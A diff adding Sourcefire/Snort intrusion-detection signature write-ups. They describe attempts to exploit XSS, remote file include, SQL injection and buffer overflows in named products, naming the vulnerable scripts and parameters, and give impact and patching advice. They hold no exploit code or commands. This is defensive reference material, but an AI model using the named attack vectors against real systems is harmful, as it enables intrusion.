@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000792
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "fg" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000634.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000634
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_add_custom.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_add_custom.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000155.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000155
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/2566.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2566
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2301.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2301
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2635.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2635
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_snapshot.begin_load" procedure is used for
+offline instantiation of snapshots.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
--- /dev/null
+++ b/doc/signatures/2395.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2395
+
+--
+Summary:
+This event is generated when an attempt is made to view a URL with the string "InteractiveQuery.jsp" in the name.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of
+your web site. Attackers can potentially gain access to your users'
+cookies or session ids, allowing the attacker to impersonate your
+user.
+
+--
+Detailed Information:
+BEA WebLogic supplies a CGI script InteractiveQuery.jsp that may be susceptible to cross-site scripting.  The vulnerability
+occurs because of improper sanitizing of data to the argument 'person'.  This may permit malicious code to be executed when
+a user visits a vulnerable site.
+
+--
+Affected Systems:
+BEA WebLogic 8.1 and earlier versions.
+
+--
+Attack Scenarios:
+An attacker can lure a user to a website that is vulnerable, perhaps permitting the malicious code to be executed on the user's host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the InteractiveQuery.jsp script or move it from the server's CGI path.
+
+Upgrade to the latest non affected versions of the software.
+
+Configure the web browser to not allow the execution of code.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak<judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/8938
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624
+
+--
--- /dev/null
+++ b/doc/signatures/3221.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3221
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/528.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 528
+
+--
+Summary:
+This event is generated when loopback traffic is seen on the network.
+
+--
+Impact:
+Possible reconnaisance.
+
+--
+Detailed Information:
+Under normal circumstances traffic to the localhost (127.0.0.0/8) should
+only be seen on the loopback interface (lo0).
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker may send traffic from a spoofed source address, in this 
+case the localhost.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Employ egress filtering at the firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/firewall/egress.php
+
+--
--- /dev/null
+++ b/doc/signatures/1664.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1664
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+http://www.giac.org/practical/Bjorn_Persson.doc
+
+--
--- /dev/null
+++ b/doc/signatures/527.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid: 527
+
+--
+Summary:
+This event is generated when traffic on the network is using the same 
+source and destination IP address.
+
+--
+Impact:
+Possible Denial of Service.
+
+--
+Detailed Information:
+Under normal circumstances traffic to and from the same IP address 
+should not be seen on the network. This may be an indicator for the Land
+attack tool.
+
+Some TCP/IP stacks hang or even crash when presented with a TCP SYN 
+packet containing the same source and destination IP address. Some 
+target hosts will crash others will be temporarily disabled.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+A packet that has the same source and destination IP addresses directed to TCP
+port 7007 or 7778 can cause a denial of service for Windows Media Station or
+Windows Media Monitor on Windows 2000 hosts SP2, SP3, SP4 running Windows Media
+services 4.0 or 4.1 will also generate an event from this rule.
+
+--
+Affected Systems:
+	Multiple systems from multiple vendors.
+
+--
+Attack Scenarios:
+The attacker may send traffic from a spoofed source address, in this 
+case the victims IP address.
+
+The attacker may be using the Land attack tool.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Employ egress filtering at the border router or firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/firewall/egress.php
+
+CERT:
+http://www.cert.org/advisories/CA-1997-28.html
+
+Bugtraq:
+http://www.securityfocus.com/bid/9825
+
+--
--- /dev/null
+++ b/doc/signatures/100000154.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000154
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/1037.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1037
+
+--
+Summary:
+This event is generated when an attempt is made to access the showcode.asp file. 
+
+--
+Impact:
+Intelligence gathering.  This attack may permit viewing of files on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Internet Information Server (IIS) 4.0 has sample files that instruct web developers on the use of Active Server Pages (ASP).  One particular sample file, 'showcode.asp', allows files to be viewed on the vulnerable server.  This is caused by inadequate checking of user input supplied in the "source" parameter, allowing an attacker to navigate outside the directory where the sample files are located.
+
+--
+Affected Systems:
+IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL to reference the showcode.asp file, passing it a "source" parameter of the desired file to view. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete the showcode.asp file.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0736
+
+Bugtraq
+http://www.securityfocus.com/bid/167
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10007
+
+
+--
--- /dev/null
+++ b/doc/signatures/3435.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3435
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2134.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the file register.asp directly.
+
+--
+Impact:
+Possible administrator access and arbitrary command execution.
+
+--
+Detailed Information:
+Snitz Forums is an Active Server Page (asp) application running on Microsoft Internet Information Server. A vulnerability exists in Snitz Forums that can allow an attacker to inject SQL code of his choice into the application. The file register.asp contains a flaw that can allow an attacker to gain administrator access to the site. 
+
+The attacker may be trying to gain administrator access to the host, garner information on users of the system, retrieve sensitive information or be attempting to execute arbitrary code.
+
+--
+Affected Systems:
+Any host using IIS with Snitz Forums.
+
+--
+Attack Scenarios:
+An attacker may inject SQL code of his choice. The attacker might then gain administrator access to the host or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a site not running Snitz Forums uses a file named register.asp this rule will generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000691.txt
@@ -0,0 +1,80 @@
+
+
+Rule:
+
+--
+Sid:
+100000691
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Diesel Joke Site" application running on a webserver. 
+Access to the file "category.php" with SQL commands being passed as the "id" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "category.php" script used by the 
+"Diesel Joke Site" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running the Diesel Joke Site system.
+
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Currently, no patches or workarounds exist.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Jacob <chris.jacob@sourcefire.com>
+
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+http://www.dieselscripts.com/diesel-joke-site.html
+
+--
+
--- /dev/null
+++ b/doc/signatures/299.txt
@@ -0,0 +1,60 @@
+SID:
+299
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2229.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2229
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP application phpBB.
+
+--
+Impact:
+Information disclosure possibly leading to serious system compromise.
+
+--
+Detailed Information:
+Some versions of phpBB Group phpBB suffer from a vulnerability that 
+allows an attacker to inject SQL queries of their choosing.
+
+This can result in the disclosure of passwords and other information 
+stored in the database. The data contained in the database may also be 
+corrupted by a malicious SQL query.
+
+--
+Affected Systems:
+	phpBB Group phpBB 2.0.4, 2.0.5
+
+--
+Attack Scenarios:
+The attacker can execute one of the publicly available exploit scripts.
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2633.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2633
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "rectifier_diff.differences" and "rectifier_diff.rectify"
+procedures are used to find and resolve inconsistencies between
+two replicated sites. These procedures contain a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "sname1" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/2185.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2185
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in the xlog function of certain Linux NFS Utils packages.
+
+Specifically this event is generated when UDP is used as the attack medium.
+
+--
+Impact:
+Denial of Service (DoS), possible arbitrary code execution.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol. A vulnerability exists in some versions of the Linux NFS Utilities package prior to 1.0.4 that can lead to the possible execution of arbitrary code or a DoS against the affected server.
+
+A programming error in the xlog function may be exploited by an attacker by sending RPC requests to mountd that do not contain any newline characters. This causes a buffer to overflow thus presenting the attacker with the opportunity to execute code.
+
+--
+Affected Systems:
+Systems using Linux NFS Utils prior to version 1.0.4.
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted RPC request that does not 
+contain any newline characters to the NFS server via TCP or UDP.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1084.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1084
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1875.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1875
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
